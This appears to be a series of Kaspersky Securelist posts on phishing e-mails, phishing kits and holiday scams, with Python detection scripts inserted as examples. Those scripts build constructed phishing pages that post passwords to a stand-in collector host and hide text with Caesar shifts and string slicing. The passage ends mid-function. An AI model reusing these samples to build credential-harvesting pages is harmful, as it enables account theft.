Despite the existence of instant messengers, social networks and video chats, cybercriminals continue to use e-mail as the first point of contact with the victim, even if they switch to other channels afterwards. It is mainly the topics of the e-mails that change: attackers actively exploit current events to attract the potential victims’ attention. This suggests that despite users’ general awareness of cybercriminals’ basic methods, techniques such as intimidation and the promise of a free lunch, coupled with a willingness to spend time building trust, continue to reap rewards. The aim of these e-mails is to knock the user off balance and get them to act without thinking. Therefore, it is important not only to be aware of intruders’ techniques, but to make it a habit to respond to e-mails in a calm state of mind — or not to respond at all.

On the ISP side, solutions that employ machine learning and heuristics to recognize fraudulent e-mails can help filter out such spam.

HTML attachments in phishing e-mails https://securelist.com/html-attachments-in-phishing-e-mails/106481/ Mon, 16 May 2022 08:00:08 +0000

The use of embedded HTML documents in phishing e-mails is a standard technique employed by cybercriminals. It does away with the need to put links in the e-mail body, which antispam engines and e-mail antiviruses usually detect with ease. HTML offers more possibilities than e-mail for camouflaging phishing content.

There are two main types of HTML attachments that cybercriminals use: HTML files with a link to a fake website or a full-fledged phishing page. In the first case, the attackers can not only hide a link in the file, but also automatically redirect the user to the fraudulent site when they open this file. The second type of HTML attachment makes it possible to skip creating the website altogether and save on hosting costs: the phishing form and the script that harvests the data are embedded directly in the attachment. In addition, an HTML file, like an e-mail, can be modified according to the intended victim and attack vector, allowing for more personalized phishing content.

Fig. 1. Example e-mail with an HTML attachment

Structure of phishing HTML attachments

Phishing elements in HTML attachments are usually implemented using JavaScript, which handles redirecting the user to a phishing site or collecting and sending credentials to scammers.

Fig. 2. Phishing HTML page and its source code

Typically, the HTML page sends data to a malicious URL specified in the script. Some attachments consist entirely (or mostly) of a JS script.

In the e-mail source code, the HTML attachment looks like plain text, usually Base64-encoded.

Fig. 3. HTML attachment in e-mail source code

If a file contains malicious scripts or links in plaintext, the security software can quickly parse and block it. To avoid this, cybercriminals resort to various tricks.

JavaScript obfuscation

JavaScript obfuscation is one of the most common techniques used to disguise HTML attachments. To prevent the URL in the file from being quickly spotted and blocked, phishers obfuscate either the phishing link itself or the entire script, and sometimes the whole HTML file. In some cases, cybercriminals obfuscate the code manually, but often they use ready-made tools, of which many are freely available, such as JavaScript Obfuscator.

For example, opening the HTML attachment in the phishing e-mail supposedly from HSBC Bank (see Fig. 1) in a text editor, we see some pretty confusing JS code, which, it would seem, hints neither at opening a link nor at any other meaningful action.

Fig. 4. Example of obfuscation in an HTML attachment

However, it actually is an obfuscated script that redirects the user to a phishing site. To disguise the phishing link, the attackers used a ready-made tool, allowing us to easily deobfuscate the script.

Fig. 5. Deobfuscated script from an attachment in an e-mail seemingly from HSBC Bank: link for redirecting the user

If a script, link, or HTML page is obfuscated manually, it is much harder to restore the original code. To detect phishing content in such a file, dynamic analysis may be required, which involves running and debugging the code.

Encoding

Sometimes attackers use more interesting methods. In one phishing e-mail, for instance, we found an unusual HTML attachment. As in the example above, it contained JavaScript. Because the code was so compact, one might think it was doing the same as the code in the fake HSBC e-mail — that is, redirecting the user to a phishing site. But upon running it, we found a full-fledged phishing page encoded in this small script.

Fig. 6. HTML file using the unescape() method — the source code of the file contains only five lines, one of which is empty

Fig. 7. Phishing page in the HTML attachment

The cybercriminals used an interesting trick that involves the deprecated JS method unescape(). This method substitutes the “%xx” character sequences with their ASCII equivalents in the string that is passed to it. Running the script and viewing the source code of the resulting page, we see plain HTML.

Fig. 8. The resulting HTML file

Instead of unescape(), JavaScript now uses the decodeURI() and decodeURIComponent() methods, yet most modern browsers still support unescape(). We cannot say for sure why the attackers chose a deprecated method, but it could be because modern methods are more likely to be interpreted and detected by antispam engines.
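An analyst does not need to run such an attachment to see what it hides: the unescape() payload can be expanded statically. The Python triage script below is an added example (not Kaspersky's code and not taken from the e-mails discussed): it parses a constructed .eml, flags the From-header self-spoofing described in the blackmail section above, extracts the Base64-encoded HTML attachment, reverses unescape() (both %xx and %uXXXX forms) and reports credential-harvesting indicators in the recovered markup. All addresses, host names and the attachment content are placeholders invented for the example.

```python
"""Triage helper for phishing e-mails carrying HTML attachments.
Added example, not Kaspersky's code: it parses a constructed .eml, flags
From-header self-spoofing (From equals the recipient), pulls out Base64-encoded
HTML attachments, reverses JavaScript's unescape() and reports the
credential-harvesting indicators found in the recovered markup."""
import base64
import email
import json
import re
from email import policy
from email.utils import getaddresses, parseaddr
from urllib.parse import urlparse

# --- constructed sample (all addresses, hosts and content are placeholders) ---
_PAGE = ('<html><body><form action="https://collector.example.invalid/post.php" '
         'method="post"><input name="user"><input type="password" name="pass">'
         '<input type="submit" value="Log in"></form></body></html>')
# Same transformation the phishers apply: every character becomes %xx.
_ENCODED = "".join(f"%{ord(c):02x}" for c in _PAGE)
_ATTACHMENT = f'<script>document.write(unescape("{_ENCODED}"));</script>\n'
SAMPLE_EML = (
    "From: victim@example.invalid\r\n"
    "To: victim@example.invalid\r\n"
    "Subject: Your account statement\r\n"
    "Authentication-Results: mx.example.invalid; spf=fail smtp.mailfrom=example.invalid\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: multipart/mixed; boundary="b1"\r\n'
    "\r\n--b1\r\nContent-Type: text/plain\r\n\r\nPlease open the attached statement.\r\n"
    "--b1\r\nContent-Type: text/html; name=statement.html\r\n"
    "Content-Transfer-Encoding: base64\r\n"
    'Content-Disposition: attachment; filename="statement.html"\r\n\r\n'
    + base64.b64encode(_ATTACHMENT.encode()).decode() + "\r\n--b1--\r\n"
)

UNESCAPE_CALL = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.S)


def js_unescape(s: str) -> str:
    """Reverse the deprecated unescape(): %uXXXX -> UTF-16 unit, %XX -> byte char."""
    return re.sub(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def expand_unescape(source: str) -> str:
    """Replace every unescape("...") literal with its decoded content so the
    hidden markup can be inspected without running the script."""
    return UNESCAPE_CALL.sub(lambda m: js_unescape(m.group(2)), source)


def header_findings(msg) -> list:
    """Self-spoofing (From = recipient) and failed sender authentication."""
    findings = []
    sender = parseaddr(msg.get("From", ""))[1].lower()
    recipients = {addr.lower() for _, addr in
                  getaddresses(msg.get_all("To", []) + msg.get_all("Delivered-To", []))}
    if sender and sender in recipients:
        findings.append("From header equals the recipient address (self-spoofing)")
    auth = msg.get("Authentication-Results", "")
    if re.search(r"\b(spf|dkim|dmarc)=fail\b", auth):
        findings.append("sender authentication failed: " + auth.split(";", 1)[-1].strip())
    return findings


def html_findings(source: str) -> list:
    """Indicators in one HTML attachment, after expanding unescape() payloads."""
    findings = []
    if UNESCAPE_CALL.search(source):
        findings.append("unescape() hides part of the page content")
    decoded = expand_unescape(source)
    if re.search(r"""type\s*=\s*["']?password""", decoded, re.I):
        findings.append("password field present in the attachment")
    for action in re.findall(r"""<form[^>]*\baction\s*=\s*["']([^"']+)""", decoded, re.I):
        host = urlparse(action).hostname
        if host:
            findings.append(f"form posts credentials to external host {host}")
    if re.search(r"(window\.)?location(\.href)?\s*=[^=]|location\.replace\(", decoded):
        findings.append("script redirects the browser to another page")
    return findings


def triage(raw_eml: str) -> dict:
    """Return {'headers': [...], 'attachments': {filename: [...]}} for one message."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    report = {"headers": header_findings(msg), "attachments": {}}
    for part in msg.walk():
        if part.get_content_disposition() != "attachment":
            continue
        if part.get_content_type() != "text/html":
            continue
        source = part.get_payload(decode=True).decode("utf-8", "replace")
        report["attachments"][part.get_filename() or "unnamed"] = html_findings(source)
    return report


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_EML), indent=2))
```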

Statistics

In the first four months of 2022, Kaspersky security solutions detected nearly 2 million e-mails containing malicious HTML attachments. Nearly half of them (851,328) were detected and blocked in March. January was the calmest month, with our antispam solutions detecting 299,859 e-mails with phishing HTML attachments.

Number of detected e-mails with malicious HTML attachments, January–April 2022

Conclusion

Phishers deploy a variety of tricks to bypass e-mail blocking and lure as many users as possible to their fraudulent sites. A common technique is HTML attachments with partially or fully obfuscated code. HTML files allow attackers to use scripts, obfuscate malicious content to make it harder to detect, and send phishing pages as attachments instead of links.

Kaspersky security solutions detect HTML attachments containing scripts regardless of obfuscation.

Phishing-kit market: what’s inside “off-the-shelf” phishing packages https://securelist.com/phishing-kit-market-whats-inside-off-the-shelf-phishing-packages/106149/ Thu, 24 Mar 2022 10:00:40 +0000

What are phishing kits?

One of the most common tricks scammers use in phishing attacks is to create a fake official page of a famous brand. Attackers tend to copy design elements from the real website, which is why users can find it hard to distinguish the fake pages from the official ones. Even a phishing page’s domain name can often look like the real web address of a certain brand, as cybercriminals include the name of the company or service they are posing as in the URL. This trick is known as combosquatting.

Combosquatting: registering a fake website with a domain name which contains “facebook.com”

Given that phishing websites can be efficiently blocked or added to anti-phishing databases, cybercriminals have to generate these pages quickly and in large numbers. Creating them from scratch over and over again is time-consuming, and not all cybercriminals have the web-development and administration skills it takes. That is why cybercriminals favor phishing kits, which are like model aircraft or vehicle assembly kits. They consist of ready-made templates and scripts which can be used to create phishing pages quickly and on a massive scale. Phishing kits are fairly easy to use, which is why even inexperienced attackers without any technical skills can get their heads around them.

Cybercriminals tend to use hacked official websites to host pages generated using the phishing kits, or rely on free web-hosting providers. The latter are constantly working to combat phishing and block the fake pages, although phishing websites often manage to serve their intended purpose within their short period of activity, which is to collect the victims’ personal data and send it to the criminals.

Contents of phishing kits: basic and complex phishing kits

Phishing kits are ready-to-deploy packages which require the bare minimum of effort to use. Moreover, their developers usually provide instructions with their products for inexperienced attackers. Phishing kits are usually designed to generate copies of websites representing famous brands with large audiences. After all, the more potential victims there are, the more money there is to be stolen. The phishing kits we detected in 2021 most frequently created copies of Facebook, the Dutch banking group ING, the German bank Sparkasse, as well as Adidas and Amazon.

The most basic option phishing kits offer is a ready-made phishing page which is fairly simple to upload to a web-hosting service.

Contents of simple phishing-kit archive

These phishing kits have two essential components for practical reasons:

  1. An HTML page with a phishing data-entry form and related content (style, images, scripts and other multimedia components). Attackers aim to make the page look identical to pages on the company’s official website whose users they want to target in the attack. However, the fake page’s HTML code differs from the original code.
  2. The phishing script that sends data victims enter on the fake page to cybercriminals. It is usually a simple script which parses the phishing data-entry form. In the phishing script’s code, cybercriminals also indicate the Telegram bot authentication token, e-mail address or other third-party online resources where stolen data will be sent using the phishing kit. The phishing kit’s creators often comment the line where an address or token needs to be entered.

Telegram bot token in a phishing kit’s code

Instead of providing ready-to-load pages, more sophisticated phishing kits contain their elements (images, forms, phishing script, text fragments etc.), along with a separate script which creates new pages from these elements.

Contents of a phishing-kit archive: phishing pages created automatically when index.php file is run

There are also advanced phishing packages which not only come with all the tools and elements needed to assemble the web pages, but also include a control center with a user interface. Attackers can use this control center to tailor how a phishing page functions, e.g., by specifying how they would like to receive stolen data. Some sophisticated phishing kits allow attackers to generate pages which target users from different countries using a built-in dictionary containing the same phrases in different languages.

Dictionary from an advanced phishing kit

In addition to tools for attackers to create phishing pages themselves, some phishing kits can include scripts for sending out messages containing links to phishing pages to potential victims via popular messaging apps or e-mail. These mailings tend to be the go-to channel cybercriminals use to get their pages out there. The contact details of potential victims can be found on the dark web, where a colossal number of databases are sold which detail clients of various companies and services.

Many of the scripts for sending out messages included in phishing kits or sold separately can add a URL parameter in the links which contains the recipient’s e-mail address. This parameter is used extensively in corporate phishing attacks. Some known phishing kits which target the corporate sector are able to capture the e-mail domain located in the URL parameter and generate a phishing page tailored to this domain name. There are several common ways to deploy this dynamic content generation:

  • The text on the page adapts to the domain name, which makes it look more personalized to increase the victim’s trust.
  • Icons related to the victim’s domain name are loaded from the Internet, where the domain itself is essentially the keyword used in a search request to load the icons.

    Code with the URL of a loaded icon corresponding to the victim’s domain

    User-Related Dynamic Content: content from phishing website along with text and an icon loaded using the domain name in the URL

  • Legal iFrame Background: based on the e-mail domain, an iFrame opens with the legitimate website in the background and a phishing entry form superimposed on top of it.

    iFrame with legitimate website as the background

Anti-detection methods

Some sophisticated phishing kits include functional elements which prevent a page from being accessed by unwelcome agents, such as bots used by known anti-phishing solution developers or search engines. The latter are unwelcome, because if a phishing page ends up being a search-result hit, there’s a high risk it’ll soon get blocked.

Contents of sophisticated phishing-kit archive with bot detection

Apart from that, some of the phishing kits we detected used geoblocking. For example, phishing pages written in Japanese could only be opened from Japanese IP addresses. Blocking tended to be triggered by the User Agent string, which identifies the user’s browser, or by the IP address, although there are also techniques that analyze request headers. All of this was done to reduce the risk of the phishing page being scanned by bots belonging to developers of anti-phishing solutions, and to avoid ending up in anti-phishing databases.

Some phishing kits add various obfuscation options for the generated pages and pure “junk” code which aims to make it harder for anti-phishing solutions to detect and block these pages. Some tricks worth highlighting include:

  • Caesar cipher. Every character in the text is replaced by a character which is a fixed number of positions further along in the alphabet. This results in the text in the original code of the phishing page looking like alphabet soup, but when the page is loaded the shift reverts back and the user sees the page with normal decoded text. The script for implementing Caesar code is written by the creators of the phishing kits themselves.

    Code of a page with text encrypted in Caesar code

  • Page source encoding. Text or even the page’s entire HTML code is encoded using an algorithm such as base64 or AES and decoded on the browser’s end. Unlike Caesar code, the algorithms for decoding and decrypting data in the phishing kit’s code are implemented using standard libraries.
  • Invisible HTML tags. A large amount of code is added to the page which does not do anything during the rendering process when code becomes what’s visible on screen — its aim is to make the page harder to detect. See the example below, where chunks of text are hidden among junk HTML tags which do not appear on screen according to the information in the style sheet.

    Junk HTML tags

  • String slicing. Cutting a string into groups of characters which can be rearranged, and referring to characters by their number in a code table instead of explicitly writing them out. A massive puzzle of these substrings is pieced together when a page is loaded to form the full string.

    String slicing: concealing malicious links in code

  • Randomized HTML attributes. The randomization of tag attribute values which then have no further use in the code. This is used to trick anti-phishing technologies which work by analyzing layout: when a page’s code contains a lot of variable attributes, the detection rules the technology relies on cannot account for all of them, because the probability of a false detection would be too high.
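The Python heuristics below are an added example (not Kaspersky's detection logic) of how an analyst can surface these tricks statically: brute-forcing the Caesar shift of the page text using login-page vocabulary, measuring the share of markup hidden by the page's own style sheet, and counting string-slicing and atob() constructs. The sample page, its host name and the junk markup in it are constructed for the example.

```python
"""Static heuristics for the phishing-kit obfuscation tricks described above.
Added example, not Kaspersky's detection logic: brute-forces the Caesar shift
of page text, measures how much markup the page's own style sheet hides, and
counts string-slicing and base64-decoding constructs. The sample page and the
host name in it are constructed for this example."""
import re

# Vocabulary a credential-harvesting page almost always contains once decoded.
LOGIN_WORDS = ("password", "login", "sign in", "account", "verify", "email")
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def caesar_shift(text: str, shift: int) -> str:
    """Shift ASCII letters by `shift` positions; digits, punctuation and
    non-ASCII characters are left untouched, as the kits' own scripts do."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def keyword_score(text: str) -> int:
    """Number of login-page words found in the text (case-insensitive)."""
    low = text.lower()
    return sum(low.count(w) for w in LOGIN_WORDS)


def recover_caesar(text: str) -> tuple:
    """Try every shift and return (shift, decoded_text, score) for the one whose
    output contains the most login-page vocabulary; shift 0 means 'not shifted'."""
    best = (0, text, keyword_score(text))
    for shift in range(1, 26):
        candidate = caesar_shift(text, shift)
        score = keyword_score(candidate)
        if score > best[2]:
            best = (shift, candidate, score)
    return best


def hidden_tag_ratio(page: str) -> float:
    """Share of elements hidden by an inline style or by a class that the page's
    own <style> block hides. Junk markup pushes this far above normal pages."""
    hidden_classes = set()
    for css in re.findall(r"<style[^>]*>(.*?)</style>", page, re.S | re.I):
        for selector, body in re.findall(r"\.([\w-]+)\s*\{([^}]*)\}", css):
            if HIDDEN_STYLE.search(body):
                hidden_classes.add(selector)
    tags = re.findall(r"<[a-zA-Z][\w-]*([^>]*)>", page)  # attribute strings of opening tags
    if not tags:
        return 0.0
    hidden = 0
    for attrs in tags:
        style = re.search(r"""style\s*=\s*["']([^"']*)""", attrs, re.I)
        classes = re.search(r"""class\s*=\s*["']([^"']*)""", attrs, re.I)
        if (style and HIDDEN_STYLE.search(style.group(1))) or \
                (classes and set(classes.group(1).split()) & hidden_classes):
            hidden += 1
    return hidden / len(tags)


def string_slicing_hits(page: str) -> int:
    """Count String.fromCharCode() calls and chains of four or more short quoted
    fragments joined with '+', the hallmarks of the string-slicing trick."""
    from_char_code = len(re.findall(r"String\.fromCharCode\s*\(", page))
    chains = len(re.findall(r"""(?:["'][^"']{1,4}["']\s*\+\s*){3,}["'][^"']{1,4}["']""", page))
    return from_char_code + chains


def assess(page: str) -> dict:
    """Run all heuristics on one page and return the indicators an analyst would
    look at first when deciding whether the page deserves deeper inspection."""
    visible = re.sub(r"<(script|style)[^>]*>.*?</\1>", " ", page, flags=re.S | re.I)
    visible = re.sub(r"<[^>]+>", " ", visible)
    shift, decoded, hits = recover_caesar(visible)
    return {
        "caesar_shift": shift,
        "recovered_text": " ".join(decoded.split()),
        "keyword_hits": hits,
        "hidden_tag_ratio": round(hidden_tag_ratio(page), 2),
        "string_slicing_hits": string_slicing_hits(page),
        "atob_calls": len(re.findall(r"\batob\s*\(", page)),
    }


# Constructed sample page: Caesar-shifted text, 20 junk hidden spans and a
# script that assembles its collector URL from two-character fragments.
VISIBLE_TEXT = "Sign in to your account. Enter your email and password to verify."
SAMPLE_PAGE = (
    "<html><head><style>.j{display:none}</style></head><body>"
    f'<div id="t">{caesar_shift(VISIBLE_TEXT, 3)}</div>'
    + '<span class="j"></span>' * 20
    + '<script>var u="ht"+"tp"+"s:"+"//"+"co"+"ll"+"ector.example.invalid";'
    'var p=String.fromCharCode(112,111,115,116);'
    'document.getElementById("t").innerText=shift(document.getElementById("t").innerText,-3);'
    "</script></body></html>"
)

if __name__ == "__main__":
    for key, value in assess(SAMPLE_PAGE).items():
        print(f"{key}: {value}")
```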

It is also worth mentioning that the developers of phishing kits themselves can use similar forms of obfuscation, with the aim of getting hold of the data their clients collect using the product. In this case, it is not the text of the phishing page that is obfuscated but the code responsible for transferring information back to the creator of the phishing kit, which is made obscure so that the client using the kit cannot understand it.

These methods may aim to prevent anti-phishing solutions from finding clues in the original page which would allow them to classify it as a phishing page. However, we have learned how to detect and successfully block these fake pages using deep automated analysis of content.

Phishing-kit pricing and marketplace

Phishing kits can be purchased on insider forums on the dark web or through private Telegram channels. Prices vary and more often than not depend on the level of sophistication and quality a particular kit has to offer. For instance, phishing kits up for sale on one Telegram channel are priced from USD 50 to 900. Moreover, some phishing kits are freely available online.

Phishing kits up for sale on a Telegram channel

Phishing kits are also sold as part of a software-as-a-service (SaaS) package. This model is dubbed Phishing-as-a-Service (PHaaS), and lately it has been growing more popular. The packages consist of a wide range of specialized scamming services: from the creation of fake websites posing as a popular brand to launching a targeted data-theft campaign. This includes studying the target audience, sending out phishing messages, as well as encrypting and sending the stolen data to the client.

For example, one online resource offering Phishing-as-a-Service has a phishing kit for stealing login credentials from a Microsoft account using an invitation to view an Excel document as bait, which can be purchased for a relatively small sum of money. The seller guarantees the product has been tried and tested on all device types, claims 100% of buyers were satisfied with the quality of the product, and promises to send the victim’s data via e-mail.

Phishing kit for creating a fake website using an Excel document as bait, sold as Phishing-as-a-Service

Statistics

Last year we detected 469 individual phishing kits, which allowed us to block 1.2 million phishing websites. The graph below shows the dynamics of the TOP 10 phishing kits we detected over the period from August 2021 to January 2022, along with the number of unique domains where each of these phishing kits was encountered. Overall, the number of unique domains where we detected content unboxed from phishing kits exceeded 25,000 in October.

Number of unique domains using the TOP 10 phishing kits, August 2021 — January 2022

Based on the data presented here, we can conclude that some phishing kits are used fairly extensively and survive for a rather long time, while others are no longer visible after a month or two.

Conclusion and advice

Scammers often rely on phishing kits to orchestrate phishing campaigns, especially those who are inexperienced and have a poor grasp of programming. They are relatively simple tools for quickly creating fake websites and collecting the data cybercriminals steal using them. Some kits can also include tools for sending out phishing e-mails, a control panel and dictionaries to localize the phishing attacks.

Cybercriminals usually get their phishing kits from forums on the dark web or closed Telegram channels. Scammers who are poor or on a tight budget can find some basic open-source tools accessible online. Those who are better-off can commission Phishing-as-a-Service, which often includes various phishing kits.

Last year alone, we detected and blocked around 1.2 million phishing pages created using phishing kits. In addition to no-frills phishing kits, we encountered more sophisticated ones which had anti-bot features, geoblocking and anti-detection methods, such as obfuscation and junk code.

Phishing websites are most frequently circulated in spam campaigns via e-mail or messaging app. We recommend users take the following precautions to avoid getting reeled in by the phishers:

  • Treat links in e-mails and messages sent by people you do not know with suspicion, as well as “viral” messages which prompt you to forward them to a set number of your contacts. Avoid clicking on links where possible; instead, manually type the URL into the address bar or open the app in question.
  • Before entering your login credentials on a website, make sure the URL in the address bar is correct.
  • Use a reliable security solution which blocks attempts to follow links leading to phishing websites.

We recommend companies keep track of new phishing kits targeting their clients or employees. You can receive information about phishing kits through services which provide data about cyberthreats, such as Kaspersky Threat Intelligence Portal.

Happy New Fear! Gift-wrapped spam and phishing https://securelist.com/new-year-phishing-spam/96124/ Fri, 07 Feb 2020 10:01:33 +0000

Pre-holiday spam

Easy money

In the run-up to Christmas and New Year, scam e-mails mentioning easy pickings, lottery winnings, and other cash surprises are especially popular. All the more so given how simple it is to adapt existing schemes simply by mentioning the holiday in the subject line.

For example, one scam e-mail with the subject line “Xsmas gift” or “Xmas offer” talks about a “special donation” and provides a contact e-mail address for more information. Recipients who respond are lured into parting with a sum of money through social engineering.

Scammers offering “Xmas gifts” are very persistent

Another Christmas-related scheme aims to steal cryptocurrency. Scammers offer the chance to earn some bitcoins before the holiday period using “secret” software that can be downloaded via a link:

After downloading and running the program (the malware Hoax.Win32.Agent.gen), the user is prompted to enter their cryptowallet credentials and wait until the request is executed.

Next, the user is informed that the cryptocurrency will be credited to their account immediately after they pay a transfer fee. The result is predictable — the user earns no bitcoins, and the “fee” goes to the scammers.

Extortion

Standard extortion schemes are also adapted for the festive period. For instance, the authors of this e-mail threaten to spoil the victim’s Christmas by smearing them as a pedophile. To prevent this, the recipient needs to transfer the equivalent of $5,000 in bitcoin to the extorters:

Malicious mailings and the corporate sector

Corporate e-mail addresses are also on the cybercriminal radar. To extract confidential information from recipients, or install malware, scammers mask malicious e-mails as business correspondence. In the pre-holiday period, when sales are on the rise, retail finds itself in a special risk zone. E-mails with malicious attachments (DOC or XLS) are sent under the guise of messages related to orders for goods.

For example, hidden in the attachment to this e-mail is Trojan-Downloader.MSOffice.SLoad.sb, which in turn downloads other malware to the victim’s computer:

Malicious attachments can also be disguised as invoices and payment notices. The archive attached to this e-mail actually contains the Trojan-PSW.MSIL.Agensla.hdt stealer, which harvests logins and passwords, and then sends them to the cybercriminals:


Statistics

The share of spam as a percentage of world email traffic gradually increased throughout the entire Q4 2019 and in December amounted to 57.26%. Thus it almost reached the maximum value for the second half of the year — 57.78% (which we recorded in August).


The share of spam in global email traffic, Q3 and Q4 2019

A similar picture was observed in Russia, although in the fall the growth was less pronounced: from September to November the amount of spam traffic grew by a total of 0.86 percentage points (compared to a growth rate of 1.14 percentage points for the entire world) to reach 51.15% of total email volume. However, during the last month of the year, the share of spam jumped dramatically by 3.36 p.p. (compared to only 1.44% for the entire world) and exceeded even the summer indicators (54.51% in December as opposed to 53.5% in July and 53.76% in August). Most likely, such a sharp rise can be attributed to the traditional uptick in holiday season activity by spammers.


The share of spam in Russian email traffic, Q3 and Q4 2019

In the Asia-Pacific region as a whole, we also observed an increase in the amount of spam in email traffic from September (50.19%) to December (52.62%). As you can see from the diagram, the increase is quite gradual. At the same time, the volume of junk messages reached a peak in January, when their share reached 55.48%. This is most likely due to the lunar new year, which is celebrated in most of the countries of the region and which this year fell on January 25.


The share of spam in email traffic in the Asia-Pacific Region, July 2019 – January 2020

Christmas/New Year phishing

Fake websites

Phishers lured users onto fake pages with the promise of favorable terms and conditions, discounts and gifts. For example, they tried to gain access to Amazon Prime accounts by offering Christmas promotions supposedly on behalf of the service; to take part, users were asked to enter their account credentials.

Besides fake versions of real websites, non-existent stores popped up online offering huge discounts. Their catalogs typically contain a very limited range of premium-class products, and the websites themselves look more like landing pages. A characteristic attribute of such sites is a countdown timer showing how much time is left before the “promotion” ends.

In addition to expensive goods, scammers offer libido-boosting drugs — also at great discounts. The product range in such “medical stores” is not very wide:

The information about the domain shows that it was registered recently, which is another indicator of fakeness.


Nor did scammers overlook gamers. For instance, we discovered phishing pages mimicking the Warface multiplayer website. In honor of New Year, one of the fakes promised gamers 30 days’ free use of some powerful weapons, while another presented a golden rifle for joining Santa’s helpers. To receive either “prize,” players had to enter their username and password on a fake login page, thereby giving the scammers access to their account. Accounts with a high in-game rank and unique, paid-for weapons can fetch a good price.

Cash gifts

Fake websites promising easy money were also given a festive makeover: they offered New Year payouts to the poor, sponsorship gifts, giveaways, etc. As usual in such cases, visitors are invited to complete a simple task, for example, take a survey and enter some personal data. After a five-digit sum seemingly ready for transfer is displayed on screen, the victim is asked to pay a service fee — which, of course, goes straight to the scammers.

To add credibility and urgency, the attackers place eye-catching information to nudge the victim into acting: notifications about the limited nature of the offer, number of visitors who are currently filling in the form, or a “bonuses” countdown:

Crypto fans did not escape phishers’ attention either. It was shortly before Christmas that we came across a scheme offering a festive giveaway of bitcoins and ether supposedly from the Binance crypto exchange. Naturally, to receive a “gift” it was necessary to confirm participation by transferring 5 BTC or 50 ETH to the “organizers.”

To promote the “event,” the scammers posted an article about it on the Medium platform with dozens of enthusiastic comments from “winning” users.

Statistics

In Q4 2019, the share of attacks that sought to steal financial data and accounts at online banks and stores out of the total number of phishing attacks amounted to 52.61%. This exceeds both the indicator for the previous quarter (43.19%) and the indicator for the whole year (51.4%). We observed a similar situation in 2018 and 2017, with the only difference being that the jump was more noticeable last year — from 44.67% on average for the entire year and 34.67% in Q3 to 51.18% in Q4.

The share of phishing attacks on online stores and financial services during Q3 and Q4 of 2017, 2018, and 2019

It is curious that by the end of 2019, fraudsters had partially lost interest in electronic payment services. For the first time in three years, in Q4 the share of phishing attacks on such resources decreased by 1.21 percentage points compared to the previous reporting period and amounted to 14%.

The share of phishing attacks on online stores and financial services during Q3 and Q4 of 2017, 2018, and 2019

At the same time, the popularity of non-financial categories of websites also fell, and in the ranking of the most popular attack targets for the last quarter, payment services rose from fourth to third place, displacing social networks and blogs, which were attacked only in 5.89% of cases. The leading targets by number of phishing attacks in Q4 were bank resources (29.73%), ahead of global Internet portals (22.81%), which had led the ranking during the previous quarter (23.81%).

The distribution of organizations whose users were attacked by phishers by category during Q4 2019

We analyzed the number of attacks on major commercial platforms during the period of November 11 to December 31. As expected, the number of attacks jumped shortly before Black Friday, which fell on November 29, and remained at a high level until the Christmas and New Year holidays. In particular, the share of phishing schemes perpetrated under the Ebay brand (of the total number of attacks that used the brand during the specified period) had held at around 1% since mid-November; by November 27 it had reached 3.15%, and by December 2 it had grown by almost one and a half percentage points to 4.63%.

The distribution of phishing attacks using the Ebay brand by day, November 11, 2019 — December 31, 2019

We observed a similar situation with phishing attacks that utilized the Alibaba brand: the peak of activity began on November 27 and lasted until December 4. In both cases there was a short break in fraudulent activity in the middle of December: on December 15 it fell practically to zero, but it began to rise again with the approach of Christmas and New Year.

The distribution of phishing attacks using the Alibaba brand by day, November 11, 2019 — December 31, 2019

Tips and recommendations

So as not to fall for scams and tricks, it is important to take easy money offers with a massive pinch of festive salt.

If you are a consumer:

  • Remember that the only free cheese is in a mousetrap. If you are suddenly offered a reward for taking part in a survey, or a huge discount on luxury goods, be very wary.
  • Do not follow links in e-mails or messages in social networks if you have even the slightest doubt.
  • Be very careful when making purchases on unfamiliar websites. If an online store has few products, it might not be real. If the URL of a well-known website seems strange, that too is cause for concern.
  • Do not install software from unknown sources advertised in e-mails.
  • Use a reliable security solution.

If you are a company employee:

  • Read incoming e-mails from strangers with a critical eye. To spot malicious content in business correspondence, we recommend that you first check the sender address and autosignature. If they do not match, it should raise a red flag. It is also worth comparing the information in the e-mail with that on the website of the company in whose name the message was sent — the contact details might be completely different.
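The sender-versus-signature check recommended for company employees can be automated at the mail gateway. The script below is an added example and not Kaspersky's code: it parses a message, takes the registrable domain of the From address, collects the domains named in the autosignature block (addresses and URLs after the last "--" line, or the final four lines when there is no separator) and flags the message when the sender's domain is not among them. The two sample messages and the domains in them are constructed for the demo.

```python
import email
import re
from email import policy

# Pull a host name out of an e-mail address or an http(s) URL.
DOMAIN_IN_ADDRESS = re.compile(r"[\w.+-]+@([\w-]+(?:\.[\w-]+)+)")
DOMAIN_IN_URL = re.compile(r"https?://([\w-]+(?:\.[\w-]+)+)", re.IGNORECASE)


def registrable(host: str) -> str:
    """Reduce a host name to its last two labels ("mail.example-corp.com" -> "example-corp.com").
    Good enough for a demo; production code should consult the public-suffix list."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def sender_domain(msg) -> str:
    """Registrable domain of the address in the From header ("" if none is found)."""
    match = DOMAIN_IN_ADDRESS.search(msg.get("From", ""))
    return registrable(match.group(1)) if match else ""


def signature_block(body: str) -> str:
    """The autosignature: everything after the last '--' separator line, or the last four lines if there is none."""
    lines = body.splitlines()
    for i in range(len(lines) - 1, -1, -1):
        if lines[i].rstrip() == "--":
            return "\n".join(lines[i + 1:])
    return "\n".join(lines[-4:])


def signature_domains(body: str) -> set:
    """Registrable domains named in the autosignature through e-mail addresses or URLs."""
    found = set()
    block = signature_block(body)
    for pattern in (DOMAIN_IN_ADDRESS, DOMAIN_IN_URL):
        for match in pattern.finditer(block):
            found.add(registrable(match.group(1)))
    return found


def check_message(raw: str) -> dict:
    """Flag a message whose From domain does not appear among the domains its signature names."""
    msg = email.message_from_string(raw, policy=policy.default)
    text_part = msg.get_body(preferencelist=("plain",))
    body = text_part.get_content() if text_part is not None else ""
    sender = sender_domain(msg)
    named = signature_domains(body)
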